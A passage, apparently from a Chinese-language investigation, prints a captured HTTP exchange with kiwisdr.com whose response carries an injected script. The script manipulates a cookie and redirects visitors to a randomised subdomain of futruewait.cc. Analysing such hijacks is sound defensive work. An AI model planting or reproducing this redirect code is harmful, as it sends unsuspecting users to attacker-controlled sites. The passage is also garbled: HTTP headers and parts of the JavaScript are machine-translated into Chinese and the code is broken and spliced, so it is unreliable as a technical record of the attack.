之後,經過我持續的努力,終於在截取到的檔案中發現了一些線索:
`GET /public/ HTTP/1.1
主持人:kiwisdr.com
連線:保持連線
允許不安全的請求:1
使用者代理:Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.140
接受:text/html, application/xhtml+xml, application/xml;q=0.9, image/webp, image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
如果沒有匹配:「2721824910」
如果修改時間:2025 年 3 月 29 日 週六 15:29:13 (GMT)
HTTP/1.1 200 成功
內容類型:text/html
Cache-Control:禁止使用快取
內容長度:1009
連接:關閉
<html><script type='text/javascript'>function getCookie(n){
var c = document.cookie.split(';');
for (var i = 0; i < c.length; i++) {
var cookie = c[i].trim();
if (cookie.indexOf(n) != -1) {
return cookie;
}
}
return null;
}<c.length; i++){ var j = c.replace(/空白+|\s+$/g,'');如果 (j.indexOf(n+'=') === 0) 則回傳 j.substring(n.length + 1);否則,回傳 null;var k='_d250104',v=getCookie(k)'1111111111111111111111111@24@0@1@0@+@.futruewait.cc/trunks.html?k=s4&v=1281411368',r=v.split('@'),t=parseInt(r[2]),o=parseInt(r[3]),m=parseInt(r[4]),u=r.slice(6), i = t.length; if (++t)>=o)r[0]=r[0].slice(0,-1)+'0';r[2]=t;var y=u.split('|'); var x = r[5];var w = (x == '-')如果 x 等於 '+', 則 Math.floor(Math.random())y.length): x; 如果 x 不等於 '+', 則將 r[5] 拆分成一個陣列,並...=w;r[5]=z.join('');};var e=new Date(m||(Date.now()+parseInt(r[1]))3600000));r[4]=e.getTime();document.cookie=k+'='+r.join('@')+';expires='+e.toGMTString();function rd(u){var d='abcdefghijklmnopqrstuvwxyz0123456789',t='';for(var i=0;i<6;i++){var ri=Math.floor(Math.random()d.length); t += d.charAt(ri); } return u.indexOf('*') === 0 ? t + u.slice(1):u;};window.location.href='https://'+rd(y[w]);</腳本></html>HTTP/1.1 200 成功
允許來源:*
變更:Accept-Encoding
內容編碼:gzip
最後修改時間:星期六,2025 年 4 月 5 日 15:34:41 (GMT)
ETag: "1625282316"
內容類型:text/html
Accept-Ranges: bytes
內容長度:160571
日期:2025年4月5日(星期六)下午3時36分23秒 (GMT)
伺服器:lighttpd/1.4.35